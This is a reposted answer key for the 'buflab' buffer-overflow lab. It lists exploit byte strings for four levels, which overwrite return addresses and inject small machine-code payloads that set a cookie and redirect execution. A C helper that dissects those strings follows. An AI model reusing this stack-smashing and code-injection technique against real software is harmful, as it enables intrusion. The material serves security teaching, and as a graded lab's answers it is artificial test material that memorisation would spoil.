buflab

Level 0: 
re-write return address with smoke()'s address '0x08048ef0' 
so exploit file should be: 
---- 
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 f0 8e 04 08 
---- 
'30' can be any byte value 

Level 1: 
re-write return address with fizz()'s address '0x08048e80' 
re-write argument with cookie code '0x11264556' 
---- 
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 80 8e 04 08 56 45 26 11 
---- 
'30' can be any byte value 

Level 2: 
re-write return address to the start of array 0xbfffb70c, where we put the code 
the code is: 

3: b8 56 45 26 11 mov $0x11264556,%eax 
8: a3 dc b0 04 08 mov %eax,0x804b0dc 
d: 68 10 8e 04 08 push $0x8048e10 
12: c3 ret 

the code re-writes the value of global_value at 0x0804b0dc with cookie code 0x11264556, 
then pushes bang()'s address (0x08048e10) and returns to it 
---- 
b8 56 45 26 11 a3 dc b0 04 08 68 10 8e 04 08 c3 0c b7 ff bf 
---- 

Level 3: 
re-write return address to the start of array 0xbfffb70c, where we put the code 
re-write the saved ebp with the original value 0xbfffb748 
the code is: 
3: b8 56 45 26 11 mov $0x11264556,%eax 
8: 68 9c 91 04 08 push $0x804919c 
d: c3 ret 
re-write the eax register with cookie code 0x11264556 
push the real return address, and return 
---- 
b8 56 45 26 11 68 9c 91 04 08 c3 90 48 b7 ff bf 0c b7 ff bf 
---- 
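
Added example (not part of the original notes): a C helper that maps an exploit string from the levels above onto the frame layout implied by the Level 3 string and reports whether the overwritten return address points back into the copied input. The 12-byte buffer / saved ebp / return address layout is inferred from that string, and the names frame_view, dissect and BUF_ADDR are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Layout inferred from the Level 3 string (an assumption): 12 buffer bytes,
   saved %ebp, return address. BUF_ADDR is the array address the notes give. */
#define BUF_ADDR 0xbfffb70cu
struct frame_view {
    uint32_t saved_ebp, ret_addr;
    size_t extra;      /* bytes written past the return-address slot */
    int ret_in_input;  /* 1 if ret_addr points into the copied bytes */
};

/* IA-32 stores 32-bit values least significant byte first. */
static uint32_t le32(const uint8_t *p) {
    return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Parse "30 f0 8e ..." into bytes; returns the count, or -1 on bad input. */
static int parse_hex(const char *s, uint8_t *out, size_t cap) {
    size_t n = 0;
    for (char *end;; s = end) {
        unsigned long v = strtoul(s, &end, 16);
        if (end == s) break;                  /* no more hex digits */
        if (v > 0xff || n == cap) return -1;  /* not a byte, or too long */
        out[n++] = (uint8_t)v;
    }
    return s[strspn(s, " \n")] ? -1 : (int)n; /* reject trailing junk */
}

/* Returns 0 on success, -1 if malformed or too short to reach the return slot. */
int dissect(const char *hex, struct frame_view *f) {
    uint8_t raw[64];
    int n = parse_hex(hex, raw, sizeof raw);
    if (n < 20) return -1;
    f->saved_ebp = le32(raw + 12);
    f->ret_addr = le32(raw + 16);
    f->extra = (size_t)n - 20;
    f->ret_in_input = f->ret_addr >= BUF_ADDR && f->ret_addr - BUF_ADDR < (uint32_t)n;
    return 0;
}

int main(void) {
    struct frame_view f;  /* Level 3 string from the notes */
    if (dissect("b8 56 45 26 11 68 9c 91 04 08 c3 90 48 b7 ff bf 0c b7 ff bf", &f) == 0)
        printf("ebp=0x%08x ret=0x%08x in_input=%d\n", (unsigned)f.saved_ebp, (unsigned)f.ret_addr, f.ret_in_input);
    return 0;
}
```

Levels 0 and 1 report ret_in_input = 0 (return into an existing function), while Levels 2 and 3 report 1 (return into bytes placed on the stack), which is the case a non-executable stack blocks.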

Reposted from: https://www.cnblogs.com/qzchenwl/archive/2010/04/15/1712921.html
